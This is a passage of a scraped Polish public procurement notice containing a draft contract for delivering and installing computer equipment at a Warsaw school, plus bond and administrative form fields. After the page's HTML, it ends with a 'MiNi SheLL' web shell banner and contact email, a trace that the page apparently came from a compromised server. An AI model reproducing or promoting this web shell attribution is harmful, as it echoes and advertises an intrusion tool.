Wykonawcę na rzecz Zamawiającego sprzętu komputerowego fabrycznie nowego, sprawnego technicznie, wolnego od wad fizycznych i prawnych na potrzeby Szkoły prowadzonej przez Zamawiającego, którego wykaz tematyczny, ilościowy i wymagania technologiczno-techniczne stanowi Załącznik nr 1 do niniejszej umowy, zwanego dalej ,,Sprzętem", na zasadach określonych w niniejszej umowie. Na Przedmiot Umowy składa się również: wniesienie, montaż, ustawienie oraz podłączenie do sieci i uruchomienie Sprzętu niezwłocznie po wniesieniu go do budynku.2.	W ramach dostawy Wykonawca zobowiązuje się do transportu na własne ryzyko Sprzętu do siedziby Szkoły prowadzonej przez Zamawiającego przy ul. Samuela Bogumiła Lindego 20, 01-952, Warszawa zwanej dalej ,,Szkołą", a następnie do wniesienia i montażu Sprzętu na terenie Szkoły oraz ustawienia go w pomieszczeniach Szkoły wskazanych przez Zamawiającego (budynek bez windy). Wykonawca oświadcza, że zapoznał się z warunkami Szkoły i będzie możliwe wniesienie, montaż oraz ustawienie Sprzętu na powyższych zasadach.3.	Wykonawca zobowiązuje się, że dostarczony Sprzęt będzie oryginalnie opakowany (opakowania nie mogą być naruszone), opakowania będą opisane co do ich zawartości oraz oznakowane symbolem CE, zgodnie z wymogami zawartymi w Rozporządzeniu Ministra Gospodarki z dnia 21.08.2007 roku w sprawie zasadniczych wymagań dla sprzętu elektrycznego ( Dz.U. 2007 nr 155 poz. 1089 ). Sprzęt zaopatrzony będzie w instrukcje, opisy techniczne i karty gwarancyjne w języku polskim.4.	Wykonawca zobowiązuje się do pierwszego uruchomienia dostarczonego Sprzętu. Komputery będą ustawiane na nowo dostarczonych meblach, których dostawa nastąpi do dnia 07 lipca 2017 r. W przypadku dostawy oferowanego Sprzętu przed dostarczeniem mebli ustawienie i uruchomienie Sprzętu będzie musiało odbyć się w terminie ustalonym z Zamawiającym po dostawie.§ 2Termin wykonania umowy.1.	Wykonawca zobowiązuje się wykonać przedmiot umowy do dnia 14.07.2017 roku. 2.	Przez wykonanie przedmiotu umowy Strony rozumieją dostawę Sprzętu na zasadach określonych w § 1 niniejszej umowy oraz wykonanie czynności określonych w §1 ust. 2-4 niniejszej umowy.3.	Wykonawca jest zobowiązany uzgodnić z Zamawiającym termin planowanej dostawy i uruchomienia Sprzętu.4.	Dostawa może następować w częściach na zasadach uzgodnionych z Zamawiającym, jednak podpisanie protokołu odbioru Sprzętu powinno nastąpić po zakończeniu dostawy i uruchomieniu całego Sprzętu na zasadach określonych w § 3 niniejszej umowy.5.	Wykonawca odpowiada za wszelkie szkody na mieniu i osobach powstałe w związku z dostawą Sprzętu, w tym wynikłe przy wnoszeniu Sprzętu czy jego montażu. § 3Protokół odbioru1.	Potwierdzeniem wykonania przedmiotu umowy i podstawą do zapłaty wynagrodzenia będzie podpisany przez Strony bez uwag protokół odbioru Sprzętu, którego wzór stanowi Załącznik nr 2 do umowy.2.	Strony przystąpią do podpisania protokołu odbioru Sprzętu niezwłocznie po zakończeniu montażu, ustawieniu oraz uruchomieniu całego Sprzętu, będącego przedmiotem umowy. Zamawiający zobowiązany jest do stawiennictwa do odbioru w ciągu 3 godzin zegarowych od zgłoszenia przez Wykonawcę gotowości do odbioru.3.	W przypadku niezgodności dostarczonego Sprzętu z przedmiotem zamówienia, lub gdy opóźnienie Wykonawcy w wykonaniu przedmiotu umowy, w tym niedostarczenie całego Sprzętu - w terminie określonym w § 2 ust.1 przekroczy 7 dni kalendarzowychZamawiający będzie uprawniony odmówić podpisania protokołu odbioru oraz odstąpić od umowy ze skutkiem natychmiastowym, bez wyznaczania dodatkowego terminu.4.	Wykonawca odbierze Sprzęt niezgodny z przedmiotem zamówienia na swój koszt, w terminie nie dłuższym niż 3 dni robocze od dnia poinformowania go o tym fakcie oraz dostarczy nieodpłatnie Sprzęt zgodny z opisem przedmiotu zamówienia.5.	Wykonawca oświadcza, iż Sprzęt posiada wszelkie wymagane certyfikaty i dopuszczenia oraz spełnia wymogi wynikające z przepisów obowiązującego prawa.6.	Osobą upoważnioną do podpisania protokołu odbioru Sprzętu ze strony Zamawiającego jest ............................ a ze strony Wykonawcy ............................., co nie wyłącza prawa podpisania protokołu przez same Strony umowy. Zmiana osób nie powoduje zmiany niniejszej umowy i może nastąpić w drodze powiadomienia.§ 4Wynagrodzenie1.	Za wykonanie przedmiotu umowy określonego w § 1 Zamawiający zapłaci Wykonawcy wynagrodzenie ryczałtowe w wysokości .........................(słownie złotych brutto: .......................................).2.	Kwota określona w ust. 1 obejmuje zapłatę za wykonanie wszystkich zobowiązań wynikających z umowy, w tym wynagrodzenie za przeniesienie własności Sprzętu na Zamawiającego oraz wszystkie koszty związane z realizacją transportu, wniesienia, montażu, ustawienia i uruchomienia.3.	Podstawę do zapłaty stanowić będzie wystawiona przez Wykonawcę faktura VAT, z załączonym protokołem odbioru podpisanym bez uwag.4.	Fakturę należy wystawić na : Miasto Stołeczne Warszawa, Pl. Bankowy 3/5, 00-950 Warszawa, NIP 525-22-48-481Odbiorca/Płatnik: ........................................................................................................................... 5.	Ceny jednostkowe Sprzętu zawiera Załącznik nr 3 do niniejszej umowy.6.	Należności Wykonawcy z tytułu realizacji umowy płatne będą po dostawie całego Sprzętu wraz z uruchomieniem, z zastrzeżeniem § 3 ust. 3 niniejszej umowy, przelewem na rachunek bankowy Wykonawcy wskazany w fakturze VAT, w ciągu 21 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury VAT. 7.	Za datę zapłaty strony uznają datę złożenia przez Zamawiającego polecenia przelewu bankowego.§ 5Gwarancja1.	Wykonawca udziela Zamawiającemu gwarancji producenckiej na dostarczony Sprzęt, przy czym minimalny okres gwarancji wynosi 24 miesiące.2.	W ramach gwarancji Wykonawca przystępuje do naprawy lub wymiany wadliwego Sprzętu w okresie nie dłuższym niż 7 dni roboczych od momentu zgłoszenia. 3.	Zgłoszenia, o którym mowa w ust. 2 niniejszego paragrafu dokonuje się listem poleconym na adres Wykonawcy wskazany w niniejszej umowie lub na adres poczty elektronicznej: ........................ pod warunkiem otrzymania przez Zamawiającego od Wykonawcy potwierdzenia dostarczenia zgłoszenia w formie elektronicznej.4.	Jeżeli naprawa lub wymiana wadliwego Sprzętu nie zostanie dokonana w ciągu 14 dni roboczych od momentu zgłoszenia, Zamawiający ma prawo żądać zapłaty kary umownej w wysokości 50 % ceny jednostkowej tego Sprzętu z daty dostawy, wskazanej w Załączniku nr 3 do niniejszej umowy. 5.	Obowiązki gwarancyjne będą świadczone w siedzibie Zamawiającego, chyba że z przyczyn technicznych będzie to niemożliwe. Koszty transportu pokrywa Wykonawca.6.	Niezależnie od zakresu gwarancji, Wykonawca udziela Zamawiającemu rękojmi na Sprzęt na zasadach określonych w Kodeksie cywilnym, z zastrzeżeniem, że okres rękojmi biegnie od podpisania protokołu odbioru Sprzętu bez uwag.7.	Okres gwarancji ulega każdorazowo przedłużeniu o czas trwania każdej naprawy. Okres ten Wykonawca zobowiązuje się odnotować w dokumencie gwarancyjnym lub innym dokumencie potwierdzającym wykonanie naprawy.8.	W przypadku, gdy w okresie gwarancyjnym nastąpi trzykrotna naprawa Sprzętu lub jedna jego istotna naprawa ( rozumiana jako naprawa o wartości nie mniejszej niż 30% wartości naprawianego Sprzętu ) Wykonawca niezwłocznie tj. w terminie nie dłuższym niż 7 dni liczonych od dnia zgłoszenia awarii, dokona jego wymiany na sprzęt nowy, wolny od wad.9.	Zamawiający zastrzega sobie prawo do rozbudowy sprzętu w zakresie przewidzianym przez producenta, bez utraty praw gwarancyjnych.§ 6Zabezpieczenie należytego wykonania umowy1.	Strony ustalają zabezpieczenie należytego wykonania niniejszej umowy, zwane dalej ,,zabezpieczeniem", stanowiące 5 % ceny całkowitej podanej w ofercie, określonej w § 4 ust. 1 niniejszej umowy, tj. ................................................2.	Zamawiający 70 % zabezpieczenia należytego wykonania umowy zwróci lub zwolni w ciągu 30 dni od dnia podpisania protokołu odbioru Sprzętu bez uwag. 3.	Na zabezpieczenie roszczeń z tytułu rękojmi za wady Sprzętu pozostanie kwota w wysokości 30 % zabezpieczenia ustalonego w ust. 1 niniejszego paragrafu. 4.	Kwota, o której mowa w ust. 3, zostanie zwrócona Wykonawcy nie później niż w 15 dniu kalendarzowym po upływie okresu rękojmi za wady.5.	Zabezpieczenie należytego wykonania umowy w pieniądzu Zamawiający zwróci Wykonawcy z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia rachunku oraz prowizji za przelew pieniędzy na rachunek Wykonawcy.§ 7Kary umowne1.	W razie niewykonania lub nienależytego wykonania umowy Wykonawca zobowiązany jest zapłacić kary umowne:a)	w wysokości 1 % wynagrodzenia określonego w § 4 ust. 1 za każdy rozpoczęty dzień opóźnienia w dostawie Sprzętu,b)	w wysokości 20 % wynagrodzenia określonego w § 4 ust. 1 w przypadku odstąpienia przez Zamawiającego od umowy z powodu okoliczności, za które odpowiedzialność ponosi Wykonawca,c)	szkód w budynku powstałych z winy Wykonawcy przy wnoszeniu, montażu, ustawieniu oraz uruchomieniu Sprzętu - 3 % wynagrodzenia określonego w § 4 ust. 1 .d)	w wysokości 0,1% wynagrodzenia określonego w § 4 ust. 1 za każdy rozpoczęty dzień zwłoki w usuwaniu awarii Sprzętu w ramach napraw gwarancyjnych. 2.	Wykonawca wyraża zgodę na dokonanie potrącenia naliczonych kar umownych do pełnej wysokości z przysługującemu mu wynagrodzenia.3.	Zamawiającemu, niezależnie od kar umownych, z tytułu niewykonania lub nienależytego wykonania umowy przez Wykonawcę przysługuje prawo dochodzenia odszkodowania przewyższającego wysokość zastrzeżonych kar umownych.4.	Kary umowne stają się wymagalne z chwilą zaistnienia okoliczności do ich naliczenia.5.	Kary określone w ust. 1 a), b) i c) niniejszego paragrafu sumują się, przy czym maksymalna wartość naliczonych kar nie może wynieść więcej niż 30 % wynagrodzenia określonego w § 4 ust. 1.§ 8Informacja publiczna1.	Wykonawca oświadcza, że znany jest mu fakt, że treść niniejszej umowy, a w szczególności przedmiot umowy i wysokość wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1 ust.1 ustawy z dnia 6 września 2001r. o dostępie do informacji publicznej (Dz. U. z 2016 r. poz. 1764, z późn. zm.), która podlega udostępnieniu w trybie przedmiotowej ustawy, z zastrzeżeniem ust. 2.2.	Wykonawca wyraża zgodę na udostępnianie w trybie ustawy, o której mowa w ust. 1, zawartych w niniejszej umowie dotyczących danych osobowych w zakresie obejmującym imię i nazwisko, a w przypadku prowadzenia działalności gospodarczej również w zakresie firmy.3.	Wykonanie umowy nie wiąże się z przetwarzaniem danych osobowych w rozumieniu ustawy o ochronie danych osobowych, dla których Administratorem Danych jest Prezydent m.st. Warszawy, a co za tym idzie nie wiąże się z dostępem do systemów informatycznych Urzędu M. St. Warszawy.§ 9Postanowienia końcowe1.	Zamawiający wskazuje następującą osobę upoważnioną do koordynacji wykonania niniejszej umowy ze strony Zamawiającego: ................................................. .....................................................2.	Wykonawca wskazuje następującą osobę upoważnioną do koordynacji wykonania niniejszej umowy ze strony Wykonawcy: ...................................................................................................................3.	Zmiana osób lub danych kontaktowych osób wskazanych w ust. 1 i 2 niniejszego paragrafu nie powoduje zmiany niniejszej umowy i może nastąpić w drodze powiadomienia.4.	Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.5.	W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy Kodeksu Cywilnego. Spory mogące wyniknąć w związku z realizacją umowy, strony poddają rozstrzygnięciu właściwego dla siedziby Zamawiającego sądu powszechnego.6.	Umowa niniejsza sporządzona zostaje w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze Stron.</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający będzie żądać od Wykonawcy zabezpieczenia należytego wykonania umowyw wysokości 5% ceny całkowitej określonej w §4 ust.1 wzoru umowy zamieszczonego wsekcji IV - pkt 4) Ogłoszenia (stanowiącego załącznik nr 2 do Ogłoszenia). 1.Przedzawarciem umowy - Wykonawca zobowiązany jest wnieść zabezpieczenie należytegowykonania umowy. Termin na jaki ma być wniesione zabezpieczenie, wynika ze wzoruumowy. 2. Za dzień wniesienia zabezpieczenia uznaje się dzień wpłynięcia zabezpieczenia na rachunek banku Zamawiającego lub dzień złożeia zabezpieczenia w siedzibieZamawiającego, w przypadku wniesienia go w formie określonej odpowiednio wponiższym ust.3 - lit.b)-e). 3. Zabezpieczenie należytego wykonania umowy może byćwnoszone według wybory Wykonawcy w jednej lub kilku z następujących form: a) wpieniądzu, b)w poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniempieniężnym, c)w gwarancjach bankowych, d)w gwarancjach ubezpieczeniowych, e)wporęczeniach udzielanych przez podmioty o których mowa w art. 6b ust.5 pkt 2 ustawy zdnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 4.Wprzypadkach wniesienia zabezpieczenia należytego wykonania umowy w formie określonejodpowiednio w powyższym zapisie ust.3. lit. b)-e), muszą być one bezwarunkowe,nieodwołalne i płatne na każde żądanie. 5. Pozostałe wymagania/informacje dotyczącezabezpieczenia należytego wykonania umowy zamieszczone zostały w §6 wzoru umowyzamieszczonego w sekcji IV - pkt 4) Ogłoszenia (stanowiącego załącznik nr 2 doOgłoszenia).</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data"></span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina"></span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com